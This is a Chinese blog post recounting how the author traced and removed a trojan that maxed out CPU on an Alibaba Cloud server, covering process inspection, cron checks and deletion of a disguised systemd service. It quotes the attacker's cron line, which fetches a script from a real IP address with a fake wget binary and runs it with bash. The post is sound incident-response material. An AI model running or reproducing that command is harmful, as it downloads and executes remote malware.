前段时间一直在用的阿里云服务器上应用突然无法启动,查了半天发现有个进程直接把cpu给占满了,后来通过对定时任务的查看得到/usr/bin/wgetak这一文件,通过这一关键字在网上搜索找到有人遇到相同问题并提供了解决方式,现将此方法记录下来。
/**************************************************************************************************************************************************************************/
接上文,那个木马上次的解决方法是恢复前一天的镜像,但是并没有真正解决这个问题,过几天,木马又出现了,CPU 一直100%,进程的名字是/boot/vmlinuz
再次恢复到前一天的镜像还是没有解决。
随后在同事的帮忙下一起解决这个木马,以下是记录的过程:
1. 查看进程实际运行程序文件
ll /proc/22767/exe
22767是进程号,/boot/ 下并没有vmlinuz文件,随即发现实际运行程序是在 /tmp/ 下一个随机文件
2. 删除 /tmp/ 下所有文件
删除后,再kill进程有点效果,没有马上出现新的进程。但是5分钟后进程又出现了。说明应该有类似定时的任务
3. 检查定时任务
crontab -l
果真发现可疑定时任务,
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.15.56.161:443 && bash /tmp/seasame
查了一下这个ip是荷兰的,wget 命令是常用的命令,而 wgetak 估计是一个木马带的一个类似 wget 的命令,不断的从这个ip下载脚本,存到/tmp/seasame下,然后这个脚本生成一个随机的文件来运行,脚本的内容如下:
对应的解决措施包括以下几步:
- 删除 /usr/bin/wgetak 文件
- crontab -e 命令删除对应的定时任务
- 继续删除 /tmp 下所有文件,kill 进程
以上措施做完,还是担心隐藏了什么启动服务。
4. 搜索包含 wgetak 的文件
grep "wgetak" /etc/ -nri
在 /etc/systemd/system/cloud_agent.service 里找到了,文件伪装成类似阿里的后台云监控服务名。
果断删除之。
重启机器,恢复正常。不太清楚这个木马的作用是什么,挖矿?也不确定什么漏洞导致感染木马,Google并不能查到类似的问题。或许服务器还是有很大风险。
作者:voxer
链接:https://www.jianshu.com/p/c352557d5430
来源:简书
简书著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。